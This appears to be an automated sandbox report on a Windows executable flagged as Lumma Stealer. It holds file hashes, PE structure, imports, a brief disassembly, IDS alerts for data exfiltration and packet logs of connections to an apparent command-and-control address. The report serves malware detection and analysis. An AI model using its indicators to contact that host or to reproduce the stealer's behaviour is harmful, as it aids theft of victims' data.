                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="586136" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                  Category:dropped
                                                                  Size (bytes):1835008
                                                                  Entropy (8bit):4.465456372302432
                                                                  Encrypted:false
                                                                  SSDEEP:6144:LIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNRdwBCswSbD:MXD94+WlLZMM6YFHL+D
                                                                  MD5:C6F2C441ECD09FF966DA7E383574F832
                                                                  SHA1:E01AAFF5C7975302F087CD6ED3CC9F28096BD3DB
                                                                  SHA-256:D503C7CA9D6EE857ACDB7DA5164DE5AEF2A2D8924B9028B5E96E0E4D574D5766
                                                                  SHA-512:BA2E6C3FD851978CF7B80CF3F1B462A6A49E958DED31B645317191F5A75EBC9EF4FAE1273F82724D3757893F7538A54668AB2490773D806BE38F9B481F92067A
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmj...5..............................................................................................................................................................................................................................................................................................................................................}_..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):7.478193783736392
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:g1kWKm20Z5.exe
                                                                  File size:440'832 bytes
                                                                  MD5:33f4cf8b4c1f6c07e80c74669d31021b
                                                                  SHA1:a2d722720565ab8659c066aaf693f5b2ad8fb3d3
                                                                  SHA256:6b3ef3a90ba62f467b95d06765ab128bfec21ea012fd4f1e0927ca0d09169d86
                                                                  SHA512:1ef0b1eccd6dd90df14c0f0567f9a3b57e74ef74dbe44a764fece43fe6ca7d1df01bb2d7409c3167e74d6f27b862e4c68e5bdd32031a23a3f1f87af28290f240
                                                                  SSDEEP:6144:Cj0t6wsVjQTgZTI4CcWDLszhmMZcjRfIL5tMD1XqTS41rQ76iW51TLOF82Ul:CIt6wMMST0TuhmMZclSuBEpQcdL1
                                                                  TLSH:AF94BF0372E17C60F62687718F2ED6F8662EF5508F597BAB1A159A2F08B11B2C373315
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........\..r...r...r.......r.......r.......r.......r...s.;.r.......r.......r.......r.Rich..r.........PE..L...u..a.................j.
                                                                  Icon Hash:412d25010561973e
                                                                  Entrypoint:0x408bc1
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x61B1DD75 [Thu Dec 9 10:41:57 2021 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:5
                                                                  OS Version Minor:1
                                                                  File Version Major:5
                                                                  File Version Minor:1
                                                                  Subsystem Version Major:5
                                                                  Subsystem Version Minor:1
                                                                  Import Hash:496128ad91bbbd96eb429e15aca0d468
                                                                  Instruction
                                                                  call 00007F8C80F5CAC4h
                                                                  jmp 00007F8C80F570AEh
                                                                  push dword ptr [0045C0B8h]
                                                                  call dword ptr [004010F4h]
                                                                  test eax, eax
                                                                  je 00007F8C80F57224h
                                                                  call eax
                                                                  push 00000019h
                                                                  call 00007F8C80F5B5AAh
                                                                  push 00000001h
                                                                  push 00000000h
                                                                  call 00007F8C80F5916Eh
                                                                  add esp, 0Ch
                                                                  jmp 00007F8C80F59133h
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  mov ecx, dword ptr [esp+04h]
                                                                  test ecx, 00000003h
                                                                  je 00007F8C80F57246h
                                                                  mov al, byte ptr [ecx]
                                                                  add ecx, 01h
                                                                  test al, al
                                                                  je 00007F8C80F57270h
                                                                  test ecx, 00000003h
                                                                  jne 00007F8C80F57211h
                                                                  add eax, 00000000h
                                                                  lea esp, dword ptr [esp+00000000h]
                                                                  lea esp, dword ptr [esp+00000000h]
                                                                  mov eax, dword ptr [ecx]
                                                                  mov edx, 7EFEFEFFh
                                                                  add edx, eax
                                                                  xor eax, FFFFFFFFh
                                                                  xor eax, edx
                                                                  add ecx, 04h
                                                                  test eax, 81010100h
                                                                  je 00007F8C80F5720Ah
                                                                  mov eax, dword ptr [ecx-04h]
                                                                  test al, al
                                                                  je 00007F8C80F57254h
                                                                  test ah, ah
                                                                  je 00007F8C80F57246h
                                                                  test eax, 00FF0000h
                                                                  je 00007F8C80F57235h
                                                                  test eax, FF000000h
                                                                  je 00007F8C80F57224h
                                                                  jmp 00007F8C80F571EFh
                                                                  lea eax, dword ptr [ecx-01h]
                                                                  mov ecx, dword ptr [esp+04h]
                                                                  sub eax, ecx
                                                                  ret
                                                                  lea eax, dword ptr [ecx-02h]
                                                                  mov ecx, dword ptr [esp+04h]
                                                                  sub eax, ecx
                                                                  ret
                                                                  lea eax, dword ptr [ecx-03h]
                                                                  mov ecx, dword ptr [esp+04h]
                                                                  sub eax, ecx
                                                                  ret
                                                                  lea eax, dword ptr [ecx-04h]
                                                                  mov ecx, dword ptr [esp+04h]
                                                                  Programming Language:
                                                                  • [ASM] VS2010 build 30319
                                                                  • [C++] VS2010 build 30319
                                                                  • [ C ] VS2010 build 30319
                                                                  • [IMP] VS2008 SP1 build 30729
                                                                  • [RES] VS2010 build 30319
                                                                  • [LNK] VS2010 build 30319
                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x16c940x50.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x2db0000x113c0.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x43500x40.text
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x10000x1f0.text
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x168060x16a00ceb684546bf2ba621dc0ff91b8bf007bFalse0.5262862569060773data6.399556964516839IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .data0x180000x2c2fa80x4380052a08bac948c68fbb07dc6b4fce62075unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .rsrc0x2db0000x113c00x11400d63e69c9c54c8a044762721fd27e8a22False0.34288666213768115data4.049478983681206IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_ICON0x2db6a00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.4891696750902527
                                                                  RT_ICON0x2db6a00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.4891696750902527
                                                                  RT_ICON0x2dbf480x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.554147465437788
                                                                  RT_ICON0x2dbf480x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.554147465437788
                                                                  RT_ICON0x2dc6100x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.5491329479768786
                                                                  RT_ICON0x2dc6100x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.5491329479768786
                                                                  RT_ICON0x2dcb780x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.43058161350844276
                                                                  RT_ICON0x2dcb780x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.43058161350844276
                                                                  RT_ICON0x2ddc200x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.41721311475409834
                                                                  RT_ICON0x2ddc200x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.41721311475409834
                                                                  RT_ICON0x2de5a80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.449468085106383
                                                                  RT_ICON0x2de5a80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.449468085106383
                                                                  RT_ICON0x2dea700xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.2798507462686567
                                                                  RT_ICON0x2dea700xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.2798507462686567
                                                                  RT_ICON0x2df9180x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.3957373271889401
                                                                  RT_ICON0x2df9180x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.3957373271889401
                                                                  RT_ICON0x2dffe00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.39378612716763006
                                                                  RT_ICON0x2dffe00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.39378612716763006
                                                                  RT_ICON0x2e05480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.2232365145228216
                                                                  RT_ICON0x2e05480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.2232365145228216
                                                                  RT_ICON0x2e2af00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.2807223264540338
                                                                  RT_ICON0x2e2af00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.2807223264540338
                                                                  RT_ICON0x2e3b980x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.3008196721311475
                                                                  RT_ICON0x2e3b980x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.3008196721311475
                                                                  RT_ICON0x2e45200x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.34131205673758863
                                                                  RT_ICON0x2e45200x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.34131205673758863
                                                                  RT_ICON0x2e49f00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilIndia0.31636460554371004
                                                                  RT_ICON0x2e49f00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilSri Lanka0.31636460554371004
                                                                  RT_ICON0x2e58980x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilIndia0.3844765342960289
                                                                  RT_ICON0x2e58980x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilSri Lanka0.3844765342960289
                                                                  RT_ICON0x2e61400x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilIndia0.41993087557603687
                                                                  RT_ICON0x2e61400x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilSri Lanka0.41993087557603687
                                                                  RT_ICON0x2e68080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilIndia0.3959537572254335
                                                                  RT_ICON0x2e68080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilSri Lanka0.3959537572254335
                                                                  RT_ICON0x2e6d700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilIndia0.24647302904564317
                                                                  RT_ICON0x2e6d700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilSri Lanka0.24647302904564317
                                                                  RT_ICON0x2e93180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilIndia0.2790806754221388
                                                                  RT_ICON0x2e93180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilSri Lanka0.2790806754221388
                                                                  RT_ICON0x2ea3c00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilIndia0.28975409836065574
                                                                  RT_ICON0x2ea3c00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilSri Lanka0.28975409836065574
                                                                  RT_ICON0x2ead480x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilIndia0.32890070921985815
                                                                  RT_ICON0x2ead480x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilSri Lanka0.32890070921985815
                                                                  RT_STRING0x2eb4d80x3c4dataTamilIndia0.47614107883817425
                                                                  RT_STRING0x2eb4d80x3c4dataTamilSri Lanka0.47614107883817425
                                                                  RT_STRING0x2eb8a00x218dataTamilIndia0.5205223880597015
                                                                  RT_STRING0x2eb8a00x218dataTamilSri Lanka0.5205223880597015
                                                                  RT_STRING0x2ebab80x2d4Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0TamilIndia0.4613259668508287
                                                                  RT_STRING0x2ebab80x2d4Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0TamilSri Lanka0.4613259668508287
                                                                  RT_STRING0x2ebd900x5a0dataTamilIndia0.4409722222222222
                                                                  RT_STRING0x2ebd900x5a0dataTamilSri Lanka0.4409722222222222
                                                                  RT_STRING0x2ec3300x90dataTamilIndia0.5972222222222222
                                                                  RT_STRING0x2ec3300x90dataTamilSri Lanka0.5972222222222222
                                                                  RT_ACCELERATOR0x2eb2280x90dataTamilIndia0.6944444444444444
                                                                  RT_ACCELERATOR0x2eb2280x90dataTamilSri Lanka0.6944444444444444
                                                                  RT_GROUP_ICON0x2dea100x5adataTamilIndia0.7222222222222222
                                                                  RT_GROUP_ICON0x2dea100x5adataTamilSri Lanka0.7222222222222222
                                                                  RT_GROUP_ICON0x2e49880x68dataTamilIndia0.7211538461538461
                                                                  RT_GROUP_ICON0x2e49880x68dataTamilSri Lanka0.7211538461538461
                                                                  RT_GROUP_ICON0x2eb1b00x76dataTamilIndia0.6779661016949152
                                                                  RT_GROUP_ICON0x2eb1b00x76dataTamilSri Lanka0.6779661016949152
                                                                  RT_VERSION0x2eb2c80x20cdata0.5553435114503816
                                                                  None0x2eb2b80xadataTamilIndia1.8
                                                                  None0x2eb2b80xadataTamilSri Lanka1.8
                                                                  DLLImport
                                                                  KERNEL32.dllConvertThreadToFiber, InterlockedIncrement, InterlockedDecrement, WaitNamedPipeA, SetMailslotInfo, ZombifyActCtx, QueryDosDeviceA, GetModuleHandleW, EnumTimeFormatsW, SetProcessPriorityBoost, GetPrivateProfileIntA, GetPrivateProfileStructW, GetCalendarInfoW, GetConsoleAliasExesLengthW, GetFileAttributesW, WriteConsoleW, SetSystemPowerState, GetModuleFileNameW, CompareStringW, GetVolumePathNameA, GetShortPathNameA, GetProfileIntA, GetLastError, GetProcAddress, AttachConsole, GetDriveTypeW, SearchPathA, ResetEvent, OpenWaitableTimerA, LoadLibraryA, GetProcessId, InterlockedExchangeAdd, LocalAlloc, SetCalendarInfoW, FindFirstVolumeMountPointW, AddAtomW, OpenJobObjectW, SetSystemTime, GlobalWire, FindNextFileA, EnumDateFormatsA, CreateIoCompletionPort, GetModuleHandleA, FreeEnvironmentStringsW, CreateMailslotA, EnumDateFormatsW, OpenSemaphoreW, FileTimeToLocalFileTime, GetVolumeNameForVolumeMountPointW, EnumCalendarInfoExA, EnumSystemLocalesW, AreFileApisANSI, GlobalDeleteAtom, SetComputerNameA, GlobalFix, CreateFileW, FlushFileBuffers, EncodePointer, DecodePointer, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, WideCharToMultiByte, HeapFree, HeapAlloc, DeleteFileA, HeapReAlloc, GetCommandLineA, HeapSetInformation, GetStartupInfoW, RaiseException, RtlUnwind, LCMapStringW, MultiByteToWideChar, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, IsProcessorFeaturePresent, HeapCreate, ExitProcess, WriteFile, GetStdHandle, SetFilePointer, SetHandleCount, InitializeCriticalSectionAndSpinCount, GetFileType, GetModuleFileNameA, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetLocaleInfoW, HeapSize, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, GetStringTypeW, GetConsoleCP, GetConsoleMode, LoadLibraryW, SetStdHandle, CloseHandle
                                                                  GDI32.dllGetCharABCWidthsA, SelectObject
                                                                  WINHTTP.dllWinHttpGetProxyForUrl
                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  TamilIndia
                                                                  TamilSri Lanka
                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2024-11-13T10:51:06.084853+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.44973694.158.244.6980TCP
                                                                  2024-11-13T10:51:06.084853+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.44994494.158.244.6980TCP
                                                                  2024-11-13T10:51:46.541425+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.449730TCP
                                                                  2024-11-13T10:52:08.509327+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.44974394.158.244.6980TCP
                                                                  2024-11-13T10:52:17.471003+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.44979394.158.244.6980TCP
                                                                  2024-11-13T10:52:24.735108+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.449877TCP
                                                                  2024-11-13T10:52:26.456597+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.44984494.158.244.6980TCP
                                                                  2024-11-13T10:52:35.200891+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.44989594.158.244.6980TCP
                                                                  2024-11-13T10:52:53.502274+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.44999194.158.244.6980TCP
                                                                  2024-11-13T10:52:54.285809+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.45001094.158.244.6980TCP
                                                                  2024-11-13T10:52:54.285809+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.45001094.158.244.6980TCP
                                                                  2024-11-13T10:53:11.490787+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.45001194.158.244.6980TCP
                                                                  2024-11-13T10:53:20.255945+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.45001294.158.244.6980TCP
                                                                  2024-11-13T10:53:29.154805+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.45001394.158.244.6980TCP
                                                                  2024-11-13T10:53:37.909184+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.45001494.158.244.6980TCP
                                                                  2024-11-13T10:53:46.703991+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.45001594.158.244.6980TCP
                                                                  2024-11-13T10:53:55.471170+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.45001694.158.244.6980TCP
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Nov 13, 2024 10:51:51.021006107 CET4973680192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:51:51.037643909 CET804973694.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:51:51.037710905 CET4973680192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:51:51.037914038 CET4973680192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:51:51.038527966 CET4973680192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:51:51.046174049 CET804973694.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:51:51.046190977 CET804973694.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:51:51.046231985 CET4973680192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:51:51.046260118 CET4973680192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:51:51.046308994 CET804973694.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:51:51.046319962 CET804973694.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:51:51.046329021 CET804973694.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:51:51.046338081 CET804973694.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:51:51.046351910 CET4973680192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:51:51.046381950 CET4973680192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:51:51.046405077 CET804973694.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:51:51.046413898 CET804973694.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:51:51.046422005 CET804973694.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:51:51.046431065 CET804973694.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:51:51.051115990 CET804973694.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:51:51.051172018 CET804973694.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:51:51.051183939 CET804973694.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:51:51.051192999 CET804973694.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:51:51.051213026 CET804973694.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:51:51.051296949 CET804973694.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:51:51.069289923 CET4973680192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:51:51.074245930 CET804973694.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:51:59.519512892 CET804973694.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:00.020899057 CET4974380192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:00.025996923 CET804974394.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:00.026246071 CET4974380192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:00.026247025 CET4974380192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:00.026686907 CET4974380192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:00.031249046 CET804974394.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:00.031753063 CET804974394.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:00.031784058 CET804974394.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:00.031811953 CET804974394.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:00.031841040 CET804974394.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:00.031907082 CET804974394.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:00.031934977 CET804974394.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:00.031963110 CET804974394.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:00.032023907 CET804974394.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:00.032052040 CET804974394.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:00.032089949 CET804974394.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:08.509216070 CET804974394.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:08.509326935 CET4974380192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:08.510354042 CET4974380192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:08.516621113 CET804974394.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:08.979197025 CET4979380192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:08.984241962 CET804979394.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:08.984340906 CET4979380192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:08.984435081 CET4979380192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:08.984817982 CET4979380192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:08.989370108 CET804979394.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:08.989670992 CET804979394.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:17.467288971 CET804979394.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:17.471003056 CET4979380192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:17.471162081 CET4979380192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:17.476130009 CET804979394.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:17.967411041 CET4984480192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:17.972816944 CET804984494.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:17.972913027 CET4984480192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:17.973020077 CET4984480192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:17.973377943 CET4984480192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:17.978399992 CET804984494.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:17.978751898 CET804984494.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:26.456470966 CET804984494.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:26.456597090 CET4984480192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:26.456686974 CET4984480192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:26.462404966 CET804984494.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:26.699780941 CET4989580192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:26.710021019 CET804989594.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:26.710119009 CET4989580192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:26.710982084 CET4989580192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:26.711991072 CET4989580192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:26.715842962 CET804989594.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:26.716898918 CET804989594.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:35.200824976 CET804989594.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:35.200891018 CET4989580192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:35.201375008 CET4989580192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:35.206146002 CET804989594.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:36.041203976 CET4994480192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:36.046175957 CET804994494.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:36.046273947 CET4994480192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:36.046396017 CET4994480192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:36.046822071 CET4994480192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:36.051170111 CET804994494.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:36.051237106 CET4994480192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:36.051846981 CET804994494.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:36.051898956 CET4994480192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:36.052115917 CET804994494.158.244.69192.168.2.4
                                                                  Nov 13, 2024 10:52:36.052175999 CET4994480192.168.2.494.158.244.69
                                                                  Nov 13, 2024 10:52:36.052851915 CET804994494.158.244.69192.168.2.4
